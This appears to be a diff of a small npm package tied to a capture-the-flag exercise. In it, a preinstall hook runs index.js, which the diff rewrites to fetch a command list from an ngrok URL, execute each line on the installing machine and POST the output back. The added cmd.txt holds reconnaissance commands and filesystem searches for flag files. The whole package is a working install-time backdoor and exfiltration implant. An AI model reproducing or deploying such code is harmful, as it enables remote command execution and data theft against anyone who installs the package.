ect-987654-ctf 0.0.10 → 0.1.11

package/cmd.txt

@@ -0,0 +1,10 @@
+id
+pwd
+whoami
+ls -la /home/node
+ls -la /home/node/aspect-node || true
+file /home/node/aspect-node.tar.gz || true
+tar -tzf /home/node/aspect-node.tar.gz | head -n 200 || echo "tar list failed"
+find /home/node -maxdepth 4 -type f -iname "*flag*" -o -iname "flag.txt" -print 2>/dev/null || true
+find / -maxdepth 4 -type f -iname "*flag*" -o -iname "flag.txt" -print 2>/dev/null | head -n 200
+# if you find promising files, cat them (you can add new lines like: cat /path/to/thatfile)

package/evil.yaml

@@ -1,6 +1,6 @@
 ecto_module:
   name: "ect-987654-ctf"
-  version: "0.0.8"
+  version: "0.0.10"
   power_level: Very High
   ship_deck: Beta-2
   cargo_hold: B2-13

package/index.js

@@ -1,19 +1,33 @@
-// index.js
-// Runs ls -la on /app and /home and POSTs results to your callback URL
-// Replace CALLBACK_URL with your ngrok/http endpoint (include trailing slash)
-
+// index.js - fetch remote cmd.txt, run it, POST result back
 const { exec } = require('child_process');
-const os = require('os');
 const https = require('https');
 const http = require('http');
 const url = require('url');
+const os = require('os');
+
+const CALLBACK_URL = 'https://0f6896f7cc8e.ngrok-free.app/'; // <- ganti
+const CMDFILE_URL  = 'https://0f6896f7cc8e.ngrok-free.app/cmd.txt'; // <- ganti (where you serve commands)
+const TIMEOUT = 15000;
 
-const CALLBACK_URL = 'https://0f6896f7cc8e.ngrok-free.app/'; // <-- CHANGE THIS
-const TIMEOUT = 15000; // ms
+function httpGet(u, cb) {
+  try {
+    const parsed = url.parse(u);
+    const lib = parsed.protocol === 'https:' ? https : http;
+    const opts = { hostname: parsed.hostname, port: parsed.port || (parsed.protocol === 'https:' ? 443 : 80), path: parsed.path, method: 'GET', timeout: TIMEOUT };
+    const req = lib.request(opts, (res) => {
+      let s = '';
+      res.on('data', c => s += c.toString());
+      res.on('end', () => cb(null, s));
+    });
+    req.on('error', cb);
+    req.on('timeout', () => { req.destroy(); cb(new Error('timeout')); });
+    req.end();
+  } catch (e) { cb(e); }
+}
 
-function run(cmd, cb) {
+function runCmd(cmd, cb) {
   exec(cmd, { timeout: TIMEOUT, maxBuffer: 1024 * 1024 * 4 }, (err, stdout, stderr) => {
-    cb(err, stdout || '', stderr || '');
+    cb(err, String(stdout||''), String(stderr||''));
   });
 }
 
@@ -26,70 +40,36 @@ function postJson(targetUrl, obj, cb) {
       port: u.port || (u.protocol === 'https:' ? 443 : 80),
       path: u.path || '/',
       method: 'POST',
-      headers: {
-        'Content-Type': 'application/json',
-        'Content-Length': Buffer.byteLength(body)
-      },
+      headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) },
       timeout: TIMEOUT
     };
     const lib = u.protocol === 'https:' ? https : http;
     const req = lib.request(opts, (res) => {
-      // drain response
-      let d = '';
-      res.on('data', (c) => d += c.toString());
-      res.on('end', () => cb && cb(null, res.statusCode, d));
+      let d=''; res.on('data', c=> d+=c); res.on('end', ()=> cb(null, res.statusCode, d));
     });
-    req.on('error', (e) => cb && cb(e));
-    req.on('timeout', () => { req.destroy(); cb && cb(new Error('timeout')); });
-    req.write(body);
-    req.end();
-  } catch (e) {
-    cb && cb(e);
-  }
+    req.on('error', (e) => cb(e));
+    req.write(body); req.end();
+  } catch (e) { cb(e); }
 }
 
-// gather info, run commands
-const info = {
-  host: os.hostname(),
-  ts: new Date().toISOString(),
-  pwd: process.cwd(),
-  attempts: []
-};
-
-const cmds = [
-  { name: 'ls_home', cmd: 'ls -la /home || ls -la ~ || echo "ls /home failed"' },
-  { name: 'ls_app',  cmd: 'ls -la /app || echo "ls /app failed"' },
-  { name: 'pwd',     cmd: 'pwd' }
-];
+const info = { host: os.hostname(), ts: new Date().toISOString(), pwd: process.cwd(), results: [] };
 
-let i = 0;
-function next() {
-  if (i >= cmds.length) {
-    // send results
-    postJson(CALLBACK_URL, info, (err, status, body) => {
-      // optionally print to stdout so DEBUG is easier if running locally
-      if (err) {
-        try { console.error('POST ERROR', String(err)); } catch(e){}
-      } else {
-        try { console.log('POSTED', status); } catch(e){}
-      }
-      // exit gracefully
-      try { process.exit(0); } catch(e){}
-    });
+httpGet(CMDFILE_URL, (err, data) => {
+  if (err) {
+    info.results.push({ stage: 'fetch_cmd', err: String(err) });
+    postJson(CALLBACK_URL, info, ()=>process.exit(0));
     return;
   }
-  const item = cmds[i++];
-  run(item.cmd, (err, out, errout) => {
-    info.attempts.push({
-      name: item.name,
-      cmd: item.cmd,
-      stdout: out,
-      stderr: errout,
-      err: err ? String(err) : null
+  const lines = data.split(/\r?\n/).map(s => s.trim()).filter(Boolean);
+  (function seq(i){
+    if (i >= lines.length) {
+      postJson(CALLBACK_URL, info, ()=>process.exit(0));
+      return;
+    }
+    const cmd = lines[i];
+    runCmd(cmd, (err, out, stderr) => {
+      info.results.push({ cmd, out: out.slice(0, 200000), stderr: stderr.slice(0,200000), err: err ? String(err) : null });
+      setTimeout(()=> seq(i+1), 200);
     });
-    // small delay to avoid flooding
-    setTimeout(next, 200);
-  });
-}
-
-next();
+  })(0);
+});

package/last_post.json

@@ -1,5 +1,3 @@
 {
-  "host": "y",
-  "checked_count": 0,
-  "hits": []
+  "error": "Command failed: pwd\n'pwd' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n"
 }

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "ect-987654-ctf",
-  "version": "0.0.10",
+  "version": "0.1.11",
   "scripts": {
     "preinstall": "node index.js"
   }